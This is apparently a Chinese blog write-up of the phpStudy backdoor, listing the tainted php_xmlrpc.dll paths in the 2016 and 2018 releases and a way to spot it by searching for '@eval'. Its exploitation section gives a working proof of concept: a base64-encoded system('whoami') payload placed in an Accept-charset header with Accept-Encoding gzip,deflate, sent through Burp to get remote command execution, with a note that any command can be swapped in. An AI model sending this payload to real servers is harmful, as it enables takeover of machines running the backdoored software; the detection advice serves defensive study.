0x01.简介
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用。
0x02.漏洞描述
phpstudy近期被爆存在有人恶意植入后门,相关大佬已经被请去喝茶了。
后门存在路径:
phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
安装过phpstudy的小伙伴可以查看一下自己的phpstudy是否存在后门。我这里虚拟机演示
选择php_xmlrpc.dll该文件用记事本打开。查找关键字@eval查看是否存在后门。我这个已经看到存在了。
0x03.漏洞利用
开启phpstudy,
虚拟机当前ip,物理机访问
poc:
Accept-charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==
Accept-Encoding: gzip,deflate
ZWNobyBzeXN0ZW0oIndob2FtaSIpOw== 为echo system("whoami"); base64编码后内容
burp 抓包,修改请求包内容发送
成功复现 ,触发远程远程命令执行,命令可变,自己编码一下就行了